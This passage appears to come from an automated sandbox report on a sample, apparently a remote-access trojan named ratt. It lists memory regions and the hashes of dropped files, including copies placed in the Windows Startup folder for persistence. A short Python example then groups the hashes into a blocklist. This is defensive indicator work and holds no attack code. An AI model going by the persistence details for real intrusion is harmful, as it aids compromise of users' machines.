memory/4728-163-0x00000000029B0000-0x00000000029C0000-memory.dmp
memory/4728-166-0x0000000074D20000-0x00000000754D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 33b19d75aa77114216dbc23f43b195e3 |
| SHA1 | 36a6c3975e619e0c5232aa4f5b7dc1fec9525535 |
| SHA256 | b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2 |
| SHA512 | 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821 |
memory/4408-168-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4408-169-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/4408-170-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d6bff751a9ac261f996f2207df7f72b |
| SHA1 | ab8f55c36d55bf4aa9c26223127bd2e3809507fd |
| SHA256 | a33ca5b2ab98da552c5813fdfd859cce29d8ac4d764194dde0808b465b87477d |
| SHA512 | 0353d39deb65cc8fbe8fbf27f21c7acaa8437dbecea2bd76febb5b367347b7c1b0e0e0d8243168ab198ab41b9bcbb2bcfb405adce048a104537a57e457eb09f4 |
memory/4408-181-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/4408-183-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/5028-184-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/5028-185-0x0000000002540000-0x0000000002550000-memory.dmp
memory/5028-188-0x0000000002540000-0x0000000002550000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a6c905ffa927abb0f0f7c163a5a1dd1c |
| SHA1 | 873ba4329032762c194685f2c359e529654e8402 |
| SHA256 | d06c705f9092b2d4be7569178775b7ff17a58336e14b4c507c780b0bf95832ae |
| SHA512 | 88a495eb8896731764ca9e891c2f72ef855ca352c6794fcdac07f60d597789070f33fcbce3ae3b6fb4fc148346a70da735e8c569b8470804511315ec7a48acc2 |
memory/5028-197-0x0000000002540000-0x0000000002550000-memory.dmp
memory/5028-199-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4204-200-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/4204-210-0x00000000027F0000-0x0000000002800000-memory.dmp
memory/4204-211-0x00000000027F0000-0x0000000002800000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0dd2e3d360f7c914630427055f7bfc7c |
| SHA1 | 0a7d697032a6f1b3af69a52cc0f28a44e2a2520a |
| SHA256 | 6d849b6600794030f9b5d87c0853cc567fd250ee74a093595831546890398f35 |
| SHA512 | a87f7ecb4428f6a6470acd4be1af092f422f75d76b5908a49831c1fc151f914550a262ede9671c3c153f458f02220c2b710b74343625abf461623f281d18bf05 |
memory/4204-214-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/1784-215-0x0000000074D20000-0x00000000754D0000-memory.dmp
memory/1784-216-0x0000000003350000-0x0000000003360000-memory.dmp
memory/1784-217-0x0000000003350000-0x0000000003360000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9cf99bfede61b98f3dddd53a91dd9dfc |
| SHA1 | 63e9e9f8891e7b200fa1dabebd7a9da8144fe54a |
| SHA256 | ba339ea50392d05a66f07d0e65d7cecc219beb0b43fca230091447ce9ae6ec97 |
| SHA512 | 246f129e524a5a7f5e2b5f74e472debdb465d7e20a0158ff3b89039e870c3c1fec29c98e1030b70ba5dedbe205599500fa311e0a495dccee7ca771614eb347ad |
memory/1784-229-0x0000000003350000-0x0000000003360000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
C:\Users\Admin\AppData\Local\Temp\7z.exe
| MD5 | 8ba2e41b330ae9356e62eb63514cf82e |
| SHA1 | 8dc266467a5a0d587ed0181d4344581ef4ff30b2 |
| SHA256 | ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea |
| SHA512 | 2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d |
memory/4684-233-0x0000000000400000-0x0000000000432000-memory.dmp
memory/1784-230-0x0000000074D20000-0x00000000754D0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
memory/4684-237-0x0000000010000000-0x00000000100E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7z.dll
| MD5 | 15bbbe562f9be3e5dcbb834e635cc231 |
| SHA1 | 7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a |
| SHA256 | ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde |
| SHA512 | 769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287 |
C:\Users\Admin\AppData\Local\Temp\ratt.7z
| MD5 | 7de6fdf3629c73bf0c29a96fa23ae055 |
| SHA1 | dcb37f6d43977601c6460b17387a89b9e4c0609a |
| SHA256 | 069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff |
| SHA512 | d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8 |
memory/4684-241-0x0000000000400000-0x0000000000432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | f3e3c928063acb6abef078a4c7018bb5 |
| SHA1 | 7fe40c010d3a03bd1aa0b2ff192c07034fec496e |
| SHA256 | 571fb084ee7ad487cc9971de2a347a77e60dd3436cd233f0f18f10dc3bfed220 |
| SHA512 | 967ac65a005ba64c99658967505c36532f2ff6814cd1c9c44cf47bc8dffdffa9ac4cc2b262c992801b1596e39916bdcb43a589f82d48b370c798a326c540f112 |
memory/2084-246-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-245-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2084-247-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6f41849d143ead1529ea2217b4ecc027 |
| SHA1 | 6ad6b356f9f4bff5fb822bbd076de2c4f040713f |
| SHA256 | 06bdd2b3d1f0774140866f6bf16209ab54ff2e7a6222e1267bd13bb69e8869b7 |
| SHA512 | 450a42773b7985a2584ae24278f3d21c09fec3e57b48b3e1639831eddd6a34a2dce6b4cba52323f2dab1f7fb2bfbe33e49016459cc14ba9a19488277957faedc |
C:\Users\Admin\AppData\Local\Temp\Add.ps1
| MD5 | 0df43097e0f0acd04d9e17fb43d618b9 |
| SHA1 | 69b3ade12cb228393a93624e65f41604a17c83b6 |
| SHA256 | c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873 |
| SHA512 | 01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb |
memory/2084-259-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-260-0x0000000006AB0000-0x0000000006AE2000-memory.dmp
memory/2084-261-0x0000000070A70000-0x0000000070ABC000-memory.dmp
memory/2084-271-0x0000000006A90000-0x0000000006AAE000-memory.dmp
memory/2084-272-0x0000000007E30000-0x00000000084AA000-memory.dmp
memory/2084-273-0x0000000007800000-0x000000000781A000-memory.dmp
memory/2084-274-0x0000000007850000-0x000000000785A000-memory.dmp
memory/2084-275-0x0000000007A80000-0x0000000007B16000-memory.dmp
memory/2084-276-0x0000000007A00000-0x0000000007A0E000-memory.dmp
memory/2084-277-0x0000000007B20000-0x0000000007B3A000-memory.dmp
memory/2084-278-0x0000000007A50000-0x0000000007A58000-memory.dmp
memory/2084-279-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/2084-280-0x0000000007B90000-0x0000000007BB2000-memory.dmp
memory/2084-281-0x0000000008A60000-0x0000000009004000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 4633eb38b340638efbffd0ee1ebb7801 |
| SHA1 | 108c162e7c6b3189137bdcf4a8860ba4247d3f09 |
| SHA256 | 9446c39293b8598670e580a522f7fca4426455b2bf83ce7b1e6783e9a9a04008 |
| SHA512 | 3cd5037eb50f343b43c5fc9e6aed7186db2732ccd0d9400ff43b0cb7f7e4e435c0e82065c82d63163a35f2ebc05ffdf097d72cc536aa8da3c0df8e12b20e31d8 |
memory/2084-283-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-284-0x0000000004FE0000-0x0000000004FF0000-memory.dmp
memory/2084-285-0x000000007FCC0000-0x000000007FCD0000-memory.dmp
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
| MD5 | 669e07b57e0c14e8cfcb1e2892849d2f |
| SHA1 | 92f3b3bdbe57694546a65f842fe235c4c48c0022 |
| SHA256 | c7a20858c267b627b366865dcf696379b32ba0cb92dc8537333ba06f5b6a728d |
| SHA512 | 8ceb665214cdde2b6f1c95275d6d4251975e80faa3c50bf31298cee14b60074299cb63a5324178278cf98ca47aafa91c1bc94247b578c1f29b05256c7743f1cd |
memory/4408-288-0x00000000003E0000-0x0000000000596000-memory.dmp
memory/4408-289-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4408-290-0x0000000004AC0000-0x0000000004B5C000-memory.dmp
memory/2084-293-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4408-292-0x0000000004B60000-0x0000000004BF2000-memory.dmp
memory/4408-294-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/4408-295-0x0000000004E80000-0x0000000004E8A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ratt.exe
| MD5 | d873512e243ae188374228802a175714 |
| SHA1 | ea3c7c16219780c6ba92eb9f1d9c463efa964e6e |
| SHA256 | cde7323e6dc76e111b0d048f50e1d3f6d9c8a6eb10483cddb2b6bf2e703c9856 |
| SHA512 | 3134d5965e51326ab2416bb41add5cc67b012a5ba5b8e44fefe254624d0ece9efd83ed6fcf47b59644cc092d897a4fcf5736e1a445c13179af70fd60dbbe8d3a |
memory/4720-297-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4720-298-0x0000000000430000-0x00000000005E6000-memory.dmp
memory/4720-299-0x00000000059F0000-0x0000000005A00000-memory.dmp
memory/4408-300-0x0000000074C50000-0x0000000075400000-memory.dmp
memory/4408-301-0x0000000004D00000-0x0000000004D10000-memory.dmp
memory/4408-302-0x0000000004D00000-0x0000000004D10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log
| MD5 | 9a2d0ce437d2445330f2646472703087 |
| SHA1 | 33c83e484a15f35c2caa3af62d5da6b7713a20ae |
| SHA256 | 30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c |
| SHA512 | a61d18d90bfad9ea8afdfa37537cfea3d5a3d0c161e323fa65840c283bdc87c3de85daaff5519beea2f2719eec1c68398eea8679b55ff733a61052f073162d5d |
C:\Users\Admin\Music\rot.exe
| MD5 | 5c1cb0cc5d6da0a4540184587daca3c2 |
| SHA1 | 46297cbe9654aa34de744d6924db0176cb670d77 |
| SHA256 | 6c11a6d2f520c125099436f3e4d63a2676c51de699527bcebc54c8bb3e37095c |
| SHA512 | 4a7ecb33abaaa4ac166b7c4962f20b93bc14d9549ad4fd3960202ca34c641957a72c5f5f09dfa7235eb134c7c70d37034e4ddfc3bbba56a5b502293dccd0c5f7 |
C:\Users\Admin\Music\rot.exe
| MD5 | eb14cbe0aa96ba29651b2a8be6fd2b79 |
| SHA1 | 088c06cd809d0c2a1fdf2b23b967fdc8e27c20e7 |
| SHA256 | 2c176a5ebe06323f5d3269d98f90d05a595c6d70e0e497f4ee5544e931f16746 |
| SHA512 | 7135a1ebe1561ab2745dc12c499793e799930c186507f1a6a4ff3a78549e15b89295ca97d00023c63eb9fb8efc8002adbefcd6c63ab37cb434baa7db23bbeb96 |
C:\Users\Admin\Music\rot.exe
| MD5 | 4741768e7c2e7056840407f2ff30e259 |
| SHA1 | 16dfcb6e210c9c68f2975aa7e8b227007e4d7117 |
| SHA256 | 280fae9a30d6aa4f2baca0844a9a689080cb8827501a3cd7d62f1d54cfe91cc3 |
| SHA512 | 7cd32a3d02ffd87b134a62739854fa1fbf33068fb04b7dac85485dad03b0be8d67a7ce21da18f71c6d1c39979c2c3929ecbe4f672ee0ea77879dbfaade0028fb |
memory/4680-320-0x0000000000400000-0x000000000045E000-memory.dmp
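The Files section lists several paths more than once with different hashes: Temp\ratt.exe and the Startup-folder ratt.exe each carry two SHA256 values, and Music\rot.exe carries three, while 7z.exe and 7z.dll repeat with the same hash. A path written twice with different content means the first binary was overwritten during the run, so the last hash is what remains on disk but every hash is an indicator. The Python below is an added example, not part of the report: it groups the (path, SHA256) pairs copied from the section, drops the entries the host writes on its own, and produces the rewritten-path view and a PE blocklist. Treating the PowerShell startup-profile cache, the CLR usage logs and the PSScriptPolicyTest probe as sandbox noise is my assumption.

```python
"""Group the dropped-file hashes in this report by path to see which files were
overwritten during the run and which PE hashes to block."""

# (path, sha256) pairs copied from the Files section above; memory dumps omitted.
FILE_ENTRIES = [
    (r"C:\Users\Admin\AppData\Local\Temp\ratt.bat", "9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940"),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gezymuba.rpu.ps1", "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log", "b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive", "a33ca5b2ab98da552c5813fdfd859cce29d8ac4d764194dde0808b465b87477d"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive", "d06c705f9092b2d4be7569178775b7ff17a58336e14b4c507c780b0bf95832ae"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive", "6d849b6600794030f9b5d87c0853cc567fd250ee74a093595831546890398f35"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive", "ba339ea50392d05a66f07d0e65d7cecc219beb0b43fca230091447ce9ae6ec97"),
    (r"C:\Users\Admin\AppData\Local\Temp\7z.exe", "ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea"),
    (r"C:\Users\Admin\AppData\Local\Temp\7z.exe", "ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea"),
    (r"C:\Users\Admin\AppData\Local\Temp\7z.dll", "ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde"),
    (r"C:\Users\Admin\AppData\Local\Temp\7z.dll", "ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde"),
    (r"C:\Users\Admin\AppData\Local\Temp\ratt.7z", "069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff"),
    (r"C:\Users\Admin\AppData\Local\Temp\ratt.exe", "571fb084ee7ad487cc9971de2a347a77e60dd3436cd233f0f18f10dc3bfed220"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive", "06bdd2b3d1f0774140866f6bf16209ab54ff2e7a6222e1267bd13bb69e8869b7"),
    (r"C:\Users\Admin\AppData\Local\Temp\Add.ps1", "c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873"),
    (r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe", "9446c39293b8598670e580a522f7fca4426455b2bf83ce7b1e6783e9a9a04008"),
    (r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe", "c7a20858c267b627b366865dcf696379b32ba0cb92dc8537333ba06f5b6a728d"),
    (r"C:\Users\Admin\AppData\Local\Temp\ratt.exe", "cde7323e6dc76e111b0d048f50e1d3f6d9c8a6eb10483cddb2b6bf2e703c9856"),
    (r"C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ratt.exe.log", "30ea2f716e85f8d14a201e3fb0897d745a01b113342dfb7a9b7ac133c4ef150c"),
    (r"C:\Users\Admin\Music\rot.exe", "6c11a6d2f520c125099436f3e4d63a2676c51de699527bcebc54c8bb3e37095c"),
    (r"C:\Users\Admin\Music\rot.exe", "2c176a5ebe06323f5d3269d98f90d05a595c6d70e0e497f4ee5544e931f16746"),
    (r"C:\Users\Admin\Music\rot.exe", "280fae9a30d6aa4f2baca0844a9a689080cb8827501a3cd7d62f1d54cfe91cc3"),
]

# Assumption: these are written by PowerShell/CLR themselves, not by the sample.
SANDBOX_NOISE = ("\\PowerShell\\StartupProfileData-", "\\CLR_v4.0_32\\UsageLogs\\",
                 "\\__PSScriptPolicyTest_")


def is_sandbox_noise(path):
    return any(marker in path for marker in SANDBOX_NOISE)


def hashes_by_path(entries):
    """SHA256 values per path in the order the report lists them (repeats kept)."""
    grouped = {}
    for path, sha in entries:
        if not is_sandbox_noise(path):
            grouped.setdefault(path, []).append(sha)
    return grouped


def rewritten_paths(entries):
    """Paths that held more than one distinct binary during the run."""
    return {path: list(dict.fromkeys(shas))
            for path, shas in hashes_by_path(entries).items() if len(set(shas)) > 1}


def final_hash(entries, path):
    """The last hash recorded for a path is what is on disk when the run ends."""
    return hashes_by_path(entries)[path][-1]


def pe_blocklist(entries):
    """Every distinct hash of a dropped .exe or .dll, including overwritten versions."""
    return sorted({sha for path, shas in hashes_by_path(entries).items()
                   if path.lower().endswith((".exe", ".dll")) for sha in shas})
```

Same-hash repeats (7z.exe, 7z.dll) are not reported as rewritten, since a second write of identical content changes nothing an indicator would key on; the three rot.exe hashes, by contrast, are three different binaries that all passed through the same path.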